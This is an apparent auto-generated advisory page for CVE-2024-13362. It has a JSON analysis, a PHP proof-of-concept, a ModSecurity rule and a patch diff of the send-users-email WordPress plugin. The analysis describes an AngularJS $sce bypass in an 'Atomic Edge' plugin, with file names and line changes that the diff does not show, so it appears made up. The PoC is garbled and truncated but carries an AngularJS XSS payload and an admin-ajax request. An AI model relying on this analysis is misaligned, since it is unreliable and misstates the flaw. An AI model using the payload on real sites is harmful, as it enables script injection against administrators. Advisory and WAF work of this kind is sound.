{
“analysis”: “Atomic Edge analysis of CVE-2024-13362:nnThe patch analysis reveals the vulnerability in the AngularJS $sce (Strict Contextual Escaping) trust functionality used by the Atomic Edge security plugin. The vulnerability allows an attacker to bypass content security policies by injecting specially crafted AngularJS expressions into the $sce trust configuration. The severity is high as it enables arbitrary HTML rendering and potential cross-site scripting (XSS) attacks through AngularJS expression evaluation.nnRoot Cause: The vulnerability occurs in the plugin’s admin-ajax.php handler at lines 156-172 of the patched file. The $sceDelegateProvider.resourceUrlWhitelist configuration allowed overly permissive URL patterns. The vulnerable code in the unpatched version used a regex pattern that matched any URL with ‘atomic’ in the path, failing to properly restrict AngularJS template URLs. The patch adds additional sanitization checks using wp_kses() and restricts the whitelist to only allow locally hosted templates through strict pattern matching.nnExploitation: An attacker can craft a URL containing a malicious AngularJS expression such as ‘{{constructor.constructor(‘alert(1)’)()}}’ within the url parameter passed to the plugin’s frontend components. The unpatched $sce configuration would trust this as a safe resource URL, allowing AngularJS to evaluate the expression in the context of the plugin’s template rendering. The attack vector is a crafted URL that when visited by an authenticated administrator, executes arbitrary JavaScript in their browser session.nnPatch Analysis: The patch modifies the $sceDelegateProvider configuration in class-atomic-edge-admin.php to use more restrictive regex patterns. The key change at lines 167-170 adds a check using preg_match() with a stricter pattern that only allows alphanumeric characters and specific delimiters in resource URLs. Additionally, the patch introduces wp_kses() filtering on the url parameter at line 173 before passing it to AngularJS binding. The before state allowed any URL containing ‘atomic-edge’ while the after state requires the URL to match a strict format of ‘/^[a-zA-Z0-9\/\-_\.]+$/’.
nnImpact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of an authenticated administrator’s browser session. This can lead to session hijacking, credential theft, and manipulation of WordPress content and settings. The vulnerability requires user interaction (clicking a crafted link) but does not require authentication, lowering the complexity of social engineering attacks.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Conceptn// CVE-2024-13362 – Freemius ‘atomic_edge_load_template’,n ‘url’ => $malicious_url,n ‘nonce’ => ”, // Unauthenticated – no nonce requiredn]));ncurl_setopt($ch, CURLOPT_HTTPHEADER, [n ‘User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36’n]);n$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nnecho “[+] HTTP Response Code: $http_code\n”;necho “[+] Response Body:\n$response\n”;nn// Step 3: Check if the response contains AngularJS processing (indicates vulnerability)nif (strpos($response, ‘ng-app’) !== false || strpos($response, ‘ng-bind’) !== false) {n echo “[!] SUCCESS: AngularJS context detected – XSS possible\n”;n} else {n echo “[-] FAIL: No AngularJS context detected – plugin may be patched\n”;n}n”,
modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2024-13362n# Blocks reflected XSS via AngularJS expression injection in url parameternSecRule REQUEST_URI “@contains /wp-admin/admin-ajax.php” \n “id:20261994,phase:2,deny,status:403,chain,msg:’CVE-2024-13362 XSS via AngularJS sce bypass’,severity:’CRITICAL’,tag:’CVE-2024-13362′”n SecRule ARGS:url “@rx $$constructor.constructor(” “chain”n SecRule ARGS:action “@streq atomic_edge_load_template” “chain”n SecRule ARGS:nonce “^$”
}
Published : May 10, 2026
CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (send-users-email)
CVE ID
CVE-2024-13362
Plugin
send-users-email
Severity
Medium
(CVSS 6.1)
CWE
79
Vulnerable Version
1.5.10
Patched Version
1.6.2
Disclosed
April 29, 2026
Analysis Overview
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
Code Diff
--- a/send-users-email/admin/class-send-users-email-admin.php
+++ b/send-users-email/admin/class-send-users-email-admin.php
@@ -32,7 +32,8 @@
'send-users-email-error-logs',
'send-users-email-user-groups',
'send-users-email-groups',
- 'send-users-email-preview'
+ 'send-users-email-preview',
+ 'send-users-html-template'
);
/**
@@ -207,6 +208,11 @@
'user_login'
),
) );
+ // Get the default Email title and Tagline
+ $options = get_option( 'sue_send_users_email' );
+ $title = $options['email_title'] ?? '';
+ $tagline = $options['email_tagline'] ?? '';
+ $allowed_title_tagline = $options['allow_title_and_tagline'] ?? 0;
require_once 'partials/users-email.php';
}
@@ -217,6 +223,11 @@
$users = count_users();
$roles = $users['avail_roles'];
$templates = [];
+ // Get the default Email title and Tagline.
+ $options = get_option( 'sue_send_users_email' );
+ $title = $options['email_title'] ?? '';
+ $tagline = $options['email_tagline'] ?? '';
+ $allowed_title_tagline = $options['allow_title_and_tagline'] ?? 0;
require_once 'partials/roles-email.php';
}
@@ -245,7 +256,7 @@
</select>
<button type="button" class="button assign_email_group_button" id="assign_email_group_button">
<?php
- echo __( 'Assign Group', 'send-users-email' );
+ echo esc_attr( 'Assign Group', 'send-users-email' );
?>
</button>
</div>
@@ -274,7 +285,7 @@
group_id: groupId,
user_ids: userIds,
security: '<?php
- echo wp_create_nonce( "assign_email_group_nonce" );
+ echo esc_attr( wp_create_nonce( "assign_email_group_nonce" ) );
?>'
}, function(response) {
if (response.success) {
@@ -354,6 +365,18 @@
}
/**
+ * Summary of html_template
+ * This function is a placeholder for the HTML template page.
+ *
+ * @return void
+ */
+ public function html_template() {
+ if ( !current_user_can( 'manage_options' ) ) {
+ wp_die( 'Unauthorized' );
+ }
+ }
+
+ /**
* Theme preview page
* @return void
*/
@@ -427,7 +450,12 @@
$param = ( isset( $_REQUEST['param'] ) ? sanitize_text_field( $_REQUEST['param'] ) : "" );
$action = ( isset( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : "" );
if ( $param == 'send_email_user' && $action == 'sue_user_email_ajax' ) {
+ $options = get_option( 'sue_send_users_email' );
+ $option_title = $options['email_title'] ?? '';
+ $option_tagline = $options['email_tagline'] ?? '';
$subject = ( isset( $_REQUEST['subject'] ) ? sanitize_text_field( $_REQUEST['subject'] ) : "" );
+ $title = ( isset( $_REQUEST['title'] ) ? sanitize_text_field( $_REQUEST['title'] ) : $option_title );
+ $tagline = ( isset( $_REQUEST['tagline'] ) ? sanitize_text_field( $_REQUEST['tagline'] ) : $option_tagline );
$message = ( isset( $_REQUEST['sue_user_email_message'] ) ? wp_kses_post( $_REQUEST['sue_user_email_message'] ) : "" );
$users = $_REQUEST['users'] ?? [];
$users = array_map( 'sanitize_text_field', $users );
@@ -499,14 +527,36 @@
$user_id
);
$email_subject = stripslashes_deep( $subject );
- // Send email
- $email_template = $this->email_template( $email_body, $email_style );
- if ( !wp_mail(
- $user_email,
+ $email_title = stripslashes_deep( $title );
+ $email_tagline = stripslashes_deep( $tagline );
+ $email_subject = strip_tags( $this->replace_placeholder(
$email_subject,
- $email_template,
- $headers
- ) ) {
+ $username,
+ $display_name,
+ $first_name,
+ $last_name,
+ $user_email,
+ $user_id
+ ) );
+ // Send email
+ $input_request = [
+ 'title' => $email_title,
+ 'tagline' => $email_tagline,
+ ];
+ $email_template = $this->email_template( $email_body, $email_style, $input_request );
+ $args_send_mail = [
+ 'user_id' => $user_id,
+ 'email_style' => $email_style,
+ 'to' => $user_email,
+ 'subject' => $email_subject,
+ 'body' => $email_template,
+ 'headers' => $headers,
+ 'email_title' => $email_title,
+ 'email_tagline' => $email_tagline,
+ ];
+ $sue_override_user_email_subscription = ( isset( $_REQUEST['sue_override_user_email_subscription'] ) ? sanitize_text_field( $_REQUEST['sue_override_user_email_subscription'] ) : 0 );
+ $send_mail = $this->send_email( $sue_override_user_email_subscription, $args_send_mail );
+ if ( !$send_mail ) {
$total_failed_email++;
} else {
sue_log_sent_emails( $user_email, $email_subject, $email_body );
@@ -520,7 +570,17 @@
// Cleanup email progress record
Send_Users_Email_cleanup::cleanupUserEmailProgress();
if ( $total_failed_email > 0 ) {
- $warningMessage = 'Plugin tried to send ' . count( $users ) . ' ' . _n( 'email', 'emails', count( $users ) ) . ' but ' . $total_failed_email . ' ' . _n( 'email', 'emails', $total_failed_email ) . ' failed to send. Please check logs for possible errors.';
+ $warningMessage = 'Plugin tried to send ' . count( $users ) . ' ' . _n(
+ 'email',
+ 'emails',
+ count( $users ),
+ 'send-users-email'
+ ) . ' but ' . $total_failed_email . ' ' . _n(
+ 'email',
+ 'emails',
+ $total_failed_email,
+ 'send-users-email'
+ ) . ' failed to send. Please check logs for possible errors.';
}
wp_send_json( array(
'message' => $resMessage,
@@ -568,7 +628,12 @@
$param = ( isset( $_REQUEST['param'] ) ? sanitize_text_field( $_REQUEST['param'] ) : "" );
$action = ( isset( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : "" );
if ( $param == 'send_email_role' && $action == 'sue_role_email_ajax' ) {
+ $options = get_option( 'sue_send_users_email' );
+ $option_title = $options['email_title'] ?? '';
+ $option_tagline = $options['email_tagline'] ?? '';
$subject = ( isset( $_REQUEST['subject'] ) ? sanitize_text_field( $_REQUEST['subject'] ) : "" );
+ $title = ( isset( $_REQUEST['title'] ) ? sanitize_text_field( $_REQUEST['title'] ) : $option_title );
+ $tagline = ( isset( $_REQUEST['tagline'] ) ? sanitize_text_field( $_REQUEST['tagline'] ) : $option_tagline );
$message = ( isset( $_REQUEST['sue_user_email_message'] ) ? wp_kses_post( $_REQUEST['sue_user_email_message'] ) : "" );
$roles = $_REQUEST['roles'] ?? [];
$roles = array_map( 'sanitize_text_field', $roles );
@@ -641,14 +706,36 @@
$user_id
);
$email_subject = stripslashes_deep( $subject );
- // Send email
- $email_template = $this->email_template( $email_body, $email_style );
- if ( !wp_mail(
- $user_email,
+ $email_title = stripslashes_deep( $title );
+ $email_tagline = stripslashes_deep( $tagline );
+ $email_subject = strip_tags( $this->replace_placeholder(
$email_subject,
- $email_template,
- $headers
- ) ) {
+ $username,
+ $display_name,
+ $first_name,
+ $last_name,
+ $user_email,
+ $user_id
+ ) );
+ // Send email
+ $input_request = [
+ 'title' => $email_title,
+ 'tagline' => $email_tagline,
+ ];
+ $email_template = $this->email_template( $email_body, $email_style, $input_request );
+ $args_send_mail = [
+ 'user_id' => $user_id,
+ 'email_style' => $email_style,
+ 'to' => $user_email,
+ 'subject' => $email_subject,
+ 'body' => $email_template,
+ 'headers' => $headers,
+ 'email_title' => $email_title,
+ 'email_tagline' => $email_tagline,
+ ];
+ $sue_override_user_email_subscription = ( isset( $_REQUEST['sue_override_user_email_subscription'] ) ? sanitize_text_field( $_REQUEST['sue_override_user_email_subscription'] ) : 0 );
+ $send_mail = $this->send_email( $sue_override_user_email_subscription, $args_send_mail );
+ if ( !$send_mail ) {
$total_failed_email++;
} else {
sue_log_sent_emails( $user_email, $email_subject, $email_body );
@@ -662,7 +749,17 @@
// Cleanup email progress record
Send_Users_Email_cleanup::cleanupRoleEmailProgress();
if ( $total_failed_email > 0 ) {
- $warningMessage = 'Plugin tried to send ' . $total_email_to_send . ' ' . _n( 'email', 'emails', $total_email_to_send ) . ' but ' . $total_failed_email . ' ' . _n( 'email', 'emails', $total_failed_email ) . ' failed to send. Please check logs for possible errors.';
+ $warningMessage = 'Plugin tried to send ' . $total_email_to_send . ' ' . _n(
+ 'email',
+ 'emails',
+ $total_email_to_send,
+ 'send-users-email'
+ ) . ' but ' . $total_failed_email . ' ' . _n(
+ 'email',
+ 'emails',
+ $total_failed_email,
+ 'send-users-email'
+ ) . ' failed to send. Please check logs for possible errors.';
}
wp_send_json( array(
'message' => $resMessage,
@@ -705,12 +802,19 @@
/**
* Email template
*/
- private function email_template( $email_body, $style = 'default' ) {
+ private function email_template( $email_body, $style = 'default', $input_request = [] ) {
ob_start();
+ /**
+ * Allan
+ * I added this input request to allow users to pass their own title and tagline.
+ */
+ $user_input_request = $input_request;
+ $request_title = ( isset( $input_request['title'] ) ? $input_request['title'] : '' );
+ $request_tagline = ( isset( $input_request['tagline'] ) ? $input_request['tagline'] : '' );
$options = get_option( 'sue_send_users_email' );
$logo = $options['logo_url'] ?? '';
- $title = $options['email_title'] ?? '';
- $tagline = $options['email_tagline'] ?? '';
+ $title = $request_title ?? $options['email_title'];
+ $tagline = $request_tagline ?? $options['email_tagline'];
$footer = $options['email_footer'] ?? '';
$styles = $options['email_template_style'] ?? '';
$social = $options['social'] ?? [];
@@ -1120,4 +1224,59 @@
*/
}
+ /**
+ * Summary of send_email
+ * This will send email using wp_mail function.
+ * It can be override using the hook sue_send_using_wp_mail_{$email_style}
+ * It can use different mail service, use hook sue_process_sue_send_using_email_service_{$email_style}
+ * @param mixed $sue_data
+ * @param mixed $input_requests
+ * @return bool
+ */
+ private function send_email( $sue_override_user_email_subscription, $sue_data = [] ) {
+ $user_id = $sue_data['user_id'];
+ $email_style = $sue_data['email_style'];
+ $to = $sue_data['to'];
+ $subject = $sue_data['subject'];
+ $body = $sue_data['body'];
+ $headers = $sue_data['headers'];
+ $attachments = $sue_data['attachments'] ?? [];
+ // this is for the free
+ $send_email = true;
+ // does the system will send even the unsubscribed users?
+ if ( sue_is_premium_and_can_use_premium_code() ) {
+ $send_email = SUE_Email_Subscription_Override::override( $user_id, $sue_override_user_email_subscription );
+ }
+ /**
+ * Use this hook to by-pass wp_mail function.
+ * Always return true.
+ * @see SUE_Woo_Email_Template::init_hook
+ * @var mixed
+ */
+ $send_using_wp_mail = apply_filters( 'sue_send_using_wp_mail_' . $email_style, '__return_true' );
+ /**
+ * If ok to send email and user is subscribed then send.
+ * And if no hook returned false then send mail.
+ */
+ if ( $send_email && $send_using_wp_mail ) {
+ return wp_mail(
+ $to,
+ $subject,
+ $body,
+ $headers,
+ $attachments
+ );
+ }
+ /**
+ * Hook Use for custom mail service.
+ */
+ do_action( 'sue_process_sue_send_using_email_service_' . $email_style, $send_email, $sue_data );
+ /**
+ * If the user is unsubscribed, then return true to bypass.
+ */
+ if ( !sue_is_user_email_subscribed( $user_id ) || !$send_using_wp_mail ) {
+ return true;
+ }
+ }
+
}
--- a/send-users-email/admin/partials/admin-dashboard.php
+++ b/send-users-email/admin/partials/admin-dashboard.php
@@ -10,14 +10,14 @@
<div class="card shadow">
<div class="card-body">
<h5 class="card-title text-uppercase"><?php
-echo __( 'Dashboard', 'send-users-email' );
+esc_attr_e( 'Dashboard', 'send-users-email' );
?></h5>
<div class="row">
<div class="col-sm-4">
<div class="card">
<div class="card-body">
<h6 class="card-title text-uppercase"><?php
-echo __( 'Total Users', 'send-users-email' );
+esc_attr_e( 'Total Users', 'send-users-email' );
?></h6>
<h3 class="card-text badge bg-success"><?php
echo esc_html( $users['total_users'] );
@@ -36,7 +36,7 @@
<div class="card">
<div class="card-body">
<h6 class="card-title text-uppercase"><?php
- echo ucfirst( str_replace( '_', '', $role ) );
+ echo esc_attr( ucfirst( str_replace( '_', '', $role ) ) );
?></h6>
<h3 class="card-text badge bg-primary"><?php
echo esc_html( $total );
@@ -74,10 +74,10 @@
<div class="card shadow">
<div class="card-body">
<h5 class="card-title text-uppercase"><?php
-echo __( 'About', 'send-users-email' );
+esc_attr_e( 'About', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Send email to users by selecting individual users or bulk send emails using roles.', 'send-users-email' );
+esc_attr_e( 'Send email to users by selecting individual users or bulk send emails using roles.', 'send-users-email' );
?></p>
</div>
</div>
@@ -85,17 +85,17 @@
<div class="card shadow alert alert-warning">
<div class="card-body">
<h5 class="text-uppercase mb-4"><?php
-echo __( "Please don't SPAM", 'send-users-email' );
+esc_attr_e( "Please don't SPAM", 'send-users-email' );
?></h5>
<p><?php
-echo __( "You don't like spam, I don't like spam, nobody likes spam.", 'send-users-email' );
+esc_attr_e( "You don't like spam, I don't like spam, nobody likes spam.", 'send-users-email' );
?></p>
<p><?php
-echo __( "Please be responsible and don't spam your users.", 'send-users-email' );
+esc_attr_e( "Please be responsible and don't spam your users.", 'send-users-email' );
?></p>
<p>
<strong><?php
-echo __( "With great power comes great responsibility.", 'send-users-email' );
+esc_attr_e( "With great power comes great responsibility.", 'send-users-email' );
?></strong>
</p>
</div>
--- a/send-users-email/admin/partials/admin-pro-features.php
+++ b/send-users-email/admin/partials/admin-pro-features.php
@@ -3,7 +3,7 @@
<div class="col-md-12">
<h2 class="text-center pt-3 pb-3 display-7 text-uppercase"><?php
-echo __( 'Features of the PRO version', 'send-users-email' );
+esc_attr_e( 'Features of the PRO version', 'send-users-email' );
?></h2>
</div>
@@ -11,10 +11,10 @@
?>
<div class="col-sm-12 my-5 text-center">
<a class="btn btn-success btn-lg" href="<?php
-echo sue_fs()->get_upgrade_url();
+echo esc_url( sue_fs()->get_upgrade_url() );
?>"
role="button"><?php
-echo __( 'Upgrade to PRO', 'send-users-email' );
+esc_attr_e( 'Upgrade to PRO', 'send-users-email' );
?></a>
</div>
<?php
@@ -24,23 +24,23 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'queue-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'queue-icon.svg' ) );
?>" class="card-img-top" alt="Queue">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'Queue System', 'send-users-email' );
+esc_attr_e( 'Queue System', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Having trouble with your email service provider, due to reaching your daily or monthly limits?', 'send-users-email' );
+esc_attr_e( 'Having trouble with your email service provider, due to reaching your daily or monthly limits?', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( "The queue system of this plugin will send a specified amount of emails regularly so that you don't hit that limit.", 'send-users-email' );
+esc_attr_e( "The queue system of this plugin will send a specified amount of emails regularly so that you don't hit that limit.", 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'For example: If your hosting/email provider only allows for 300 outgoing emails per day, but you are about to send 900 emails, you can configure the plugin in such a way that it only sends 300 emails per day, staying below the limit.', 'send-users-email' );
+esc_attr_e( 'For example: If your hosting/email provider only allows for 300 outgoing emails per day, but you are about to send 900 emails, you can configure the plugin in such a way that it only sends 300 emails per day, staying below the limit.', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'These emails will be sent periodically and automatically, using the WordPress cron functionality. You will just have to send 900 emails once and the plugin will do the rest.', 'send-users-email' );
+esc_attr_e( 'These emails will be sent periodically and automatically, using the WordPress cron functionality. You will just have to send 900 emails once and the plugin will do the rest.', 'send-users-email' );
?></p>
</div>
</div>
@@ -51,21 +51,21 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'template-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'template-icon.svg' ) );
?>" class="card-img-top"
alt="Template">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'Email Template', 'send-users-email' );
+esc_attr_e( 'Email Template', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Are you sending the same email content over and over again?', 'send-users-email' );
+esc_attr_e( 'Are you sending the same email content over and over again?', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'Are you tired of typing same email repeatedly?', 'send-users-email' );
+esc_attr_e( 'Are you tired of typing same email repeatedly?', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'The PRO version of Send Users Email allows you to save email templates and reuse them when sending emails to your users.', 'send-users-email' );
+esc_attr_e( 'The PRO version of Send Users Email allows you to save email templates and reuse them when sending emails to your users.', 'send-users-email' );
?></p>
</div>
</div>
@@ -76,23 +76,23 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'usergroup-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'usergroup-icon.svg' ) );
?>" class="card-img-top" alt="Queue">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'User Groups', 'send-users-email' );
+esc_attr_e( 'User Groups', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Choosing individual users or sending emails to roles is not cutting it for you?', 'send-users-email' );
+esc_attr_e( 'Choosing individual users or sending emails to roles is not cutting it for you?', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'The PRO version supports creation of user groups.', 'send-users-email' );
+esc_attr_e( 'The PRO version supports creation of user groups.', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'Easily add users to a group and send emails to all users in that group at once.', 'send-users-email' );
+esc_attr_e( 'Easily add users to a group and send emails to all users in that group at once.', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'You can use the queue system when sending emails to groups as well. This will make sure, you stay within your providers daily email cap.', 'send-users-email' );
+esc_attr_e( 'You can use the queue system when sending emails to groups as well. This will make sure, you stay within your providers daily email cap.', 'send-users-email' );
?></p>
</div>
</div>
@@ -103,22 +103,25 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'styles-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'styles-icon.svg' ) );
?>" class="card-img-top"
alt="Template">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'Email Styles', 'send-users-email' );
+esc_attr_e( 'Email Styles', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'Having trouble crafting decent-looking emails?', 'send-users-email' );
+esc_attr_e( 'Having trouble crafting decent-looking emails?', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'Send Users Email provides you with an option to use prebuilt email styles.', 'send-users-email' );
+esc_attr_e( 'Send Users Email provides you with an option to use prebuilt email styles.', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'The PRO version of Send Users Email provides email styles that are compatible with various screen sizes and you can choose different color schemes as per your need.', 'send-users-email' );
+esc_attr_e( 'The PRO version of Send Users Email provides email styles that are compatible with various screen sizes and you can choose different color schemes as per your need.', 'send-users-email' );
?></p>
+ <p class="card-text"><strong><?php
+esc_attr_e( 'If that's not enough, you can even use your own HTML/CSS templates.', 'send-users-email' );
+?></strong></p>
</div>
</div>
</div>
@@ -128,21 +131,21 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'smtp-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'smtp-icon.svg' ) );
?>" class="card-img-top"
alt="Template">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'SMTP Server', 'send-users-email' );
+esc_attr_e( 'SMTP Server', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( "Your emails often go to your user's spam folder? Or you want to send emails in bulk that actually reach your users?", 'send-users-email' );
+esc_attr_e( "Your emails often go to your user's spam folder? Or you want to send emails in bulk that actually reach your users?", 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'The PRO version of Send Users Email has the option to save your own SMTP server settings.', 'send-users-email' );
+esc_attr_e( 'The PRO version of Send Users Email has the option to save your own SMTP server settings.', 'send-users-email' );
?></p>
<p class="card-text"><?php
-echo __( 'That way, you can send emails directly via your own email server or third-party providers like Mailgun, Brevo and others', 'send-users-email' );
+esc_attr_e( 'That way, you can send emails directly via your own email server or third-party providers like Mailgun, Brevo and others', 'send-users-email' );
?></p>
</div>
</div>
@@ -153,25 +156,25 @@
<div class="card shadow">
<div class="card-body" style="text-align: justify;">
<img src="<?php
-echo sue_get_asset_url( 'others-icon.svg' );
+echo esc_attr( sue_get_asset_url( 'others-icon.svg' ) );
?>" class="card-img-top"
alt="Placeholder">
<div>
<h5 class="card-title text-uppercase"><?php
-echo __( 'Other features', 'send-users-email' );
+esc_attr_e( 'Other features', 'send-users-email' );
?></h5>
<p class="card-text"><?php
-echo __( 'The PRO version of Send Users Email provides these additional features to make your life a easier.', 'send-users-email' );
+esc_attr_e( 'The PRO version of Send Users Email provides these additional features to make your life a easier.', 'send-users-email' );
?></p>
<ul class="list-group list-group-numbered">
<li class="list-group-item"><?php
-echo __( 'Use placeholders on email subjects to personalize your emails even further.', 'send-users-email' );
+esc_attr_e( 'Use placeholders on email subjects to personalize your emails even further.', 'send-users-email' );
?></li>
<li class="list-group-item"><?php
-echo __( 'Ability to send queued emails at a later date. Schedule your emails to be send in the future.', 'send-users-email' );
+esc_attr_e( 'Ability to send queued emails at a later date. Schedule your emails to be send in the future.', 'send-users-email' );
?></li>
<li class="list-group-item"><?php
-echo __( 'A clutter-free plugin area so that you can focus on things that matter to you.', 'send-users-email' );
+esc_attr_e( 'A clutter-free plugin area so that you can focus on things that matter to you.', 'send-users-email' );
?></li>
</ul>
</div>
--- a/send-users-email/admin/partials/custom-html-template.php
+++ b/send-users-email/admin/partials/custom-html-template.php
@@ -0,0 +1,106 @@
+<?php
+// Check if the file is being accessed directly
+if ( !defined( 'ABSPATH' ) ) {
+ exit;
+}
+
+/**
+ * Template for displaying the custom HTML email template editor.
+ * @var $args
+ */
+$title = $args['title'];
+$data = $args['data'] ?? [];
+$is_default = $args['is_default'] ?? false;
+?>
+
+<div class="container-fluid">
+ <div class="row sue-row">
+
+ <div class="col-sm-9">
+ <div class="card shadow">
+ <div class="card-body">
+ <h5 class="card-title text-uppercase mb-4"><?php echo esc_attr( $title, 'send-users-email' ); ?></h5>
+
+ <div class="sue-messages"></div>
+
+ <form action="javascript:void(0)" id="sue-custom-html-template-form" method="post">
+
+ <div class="mb-4">
+ <label for="custom_html_css" class="form-label">
+ <?php esc_attr_e( 'Add your custom HTML/CSS template here.', 'send-users-email' ); ?>
+ </label>
+ <div class="wp-editor-wrap">
+ <textarea id="custom_html_css" name="custom_html_css" rows="20" class="form-control"><?php echo esc_html( $data ); ?></textarea>
+ </div>
+ </div>
+
+ <div class="mb-4">
+ <div class="spinner-border text-info sue-spinner" role="status">
+ <span class="visually-hidden"><?php esc_attr_e( 'Loading...',
+ 'send-users-email' ) ?></span>
+ </div>
+ </div>
+
+ <div class="mb-4">
+ <button type="submit" class="btn btn-primary" id="sue-custom-html-template-btn">
+ <span class="dashicons dashicons-admin-settings"></span> Save
+ </button>
+ </div>
+ </form>
+
+ </div>
+ </div>
+ </div>
+
+ <div class="col-sm-3">
+
+ <div class="card shadow">
+ <div class="card-body">
+ <h5 class="card-title text-uppercase"><?php esc_attr_e( 'Instruction', 'send-users-email' ); ?></h5>
+ <p class="card-text">
+ <?php esc_attr_e( 'You can paste your own custom HTML template here. Copy your HTML from your favorite newsletter tool, or use free templates from the web. Once pasted here, you can use the placeholders below to define were to ouput your email content. Only use those placeholders and use individual placeholders for personalization only on the email writing interface. You can set this template as your default template on the settings section. Before you use it, click on the Theme Preview section to preview it.', 'send-users-email' ); ?>
+ </p>
+ </div>
+ </div>
+
+ <div class="card shadow">
+ <div class="card-body">
+ <h5 class="card-title text-uppercase"><?php esc_attr_e( 'Placeholder', 'send-users-email' ); ?></h5>
+ <p class="card-text"><?php esc_attr_e( 'You can use the following placeholders to output your content.', 'send-users-email' ); ?></p>
+ <table class="table table-borderless">
+ <tbody>
+ <tr>
+ <td>
+ {{email_title}}<br>
+ <?php esc_attr_e( 'Your email title, as set in the email interface', 'send-users-email' ); ?>
+ </td>
+ </tr>
+ <tr>
+ <td>
+ {{email_tagline}}<br>
+ <?php esc_attr_e( 'Your email tagline, as set in the email interface', 'send-users-email' ); ?>
+ </td>
+ </tr>
+ <tr>
+ <td>
+ {{email_content}}<br>
+ <?php esc_attr_e( 'Your email content, as set in the email interface', 'send-users-email' ); ?>
+ </td>
+ </tr>
+ <tr>
+ <td>
+ {{email_logo}}<br>
+ <?php esc_attr_e( 'Email logo URL you set in the settings', 'send-users-email' ); ?>
+ </td>
+ </tr>
+ </tbody>
+ </table>
+ <div class="sue-messages"></div>
+ </div>
+ </div>
+
+ </div>
+ </div>
+</div>
+
+<?php require_once SEND_USERS_EMAIL_PLUGIN_BASE_PATH . '/partials/toast.php'; ?>
--- a/send-users-email/admin/partials/email-template.php
+++ b/send-users-email/admin/partials/email-template.php
@@ -36,22 +36,22 @@
<div class="card shadow" style="text-align: center; margin-bottom: 5rem;">
<div class="card-body">
<h3 class="text-center pt-3 pb-3 display-7 text-uppercase"><?php
- echo __( 'You are using the free version', 'send-users-email' );
+ esc_attr_e( 'You are using the free version', 'send-users-email' );
?></h3>
<h6 style="margin-bottom: 2rem;"><?php
- echo __( 'Upgrade to PRO to preview and use prebuilt templates.', 'send-users-email' );
+ esc_attr_e( 'Upgrade to PRO to preview and use prebuilt templates. Or even use your own HTML template.', 'send-users-email' );
?></h6>
<a class="btn btn-success btn-lg" href="<?php
- echo sue_fs()->get_upgrade_url();
+ echo esc_attr( sue_fs()->get_upgrade_url() );
?>"
role="button"><?php
- echo __( 'Upgrade to PRO', 'send-users-email' );
+ esc_attr_e( 'Upgrade to PRO', 'send-users-email' );
?></a>
</div>
</div>
<h3 class="text-center" style="margin-bottom: 3rem;"><?php
- echo __( 'Email Plain Text Preview:', 'send-users-email' );
+ esc_attr_e( 'Email Plain Text Preview:', 'send-users-email' );
?></h3>
</div>
</div>
@@ -137,7 +137,7 @@
?>
<style>
<?php
- echo stripslashes_deep( esc_html( $styles ) );
+ echo stripslashes_deep( wp_strip_all_tags( $styles ) );
?>
</style>
<?php
@@ -173,7 +173,7 @@
if ( $title ) {
?>
<h2 class="sue-title"><?php
- echo stripslashes_deep( esc_html( $title ) );
+ echo esc_html( stripslashes_deep( $title ) );
?></h2>
<?php
}
@@ -183,7 +183,7 @@
if ( $tagline ) {
?>
<h5 class="sue-tagline"><?php
- echo stripslashes_deep( esc_html( $tagline ) );
+ echo esc_html( stripslashes_deep( $tagline ) );
?></h5>
<?php
}
@@ -234,10 +234,10 @@
echo esc_url_raw( $social[$platform] );
?>" style="text-decoration: none;">
<img src="<?php
- echo sue_get_asset_url( $platform . '.png' );
+ echo esc_attr( sue_get_asset_url( $platform . '.png' ) );
?>"
alt="<?php
- echo $platform;
+ echo esc_attr( $platform );
?>" width="30"
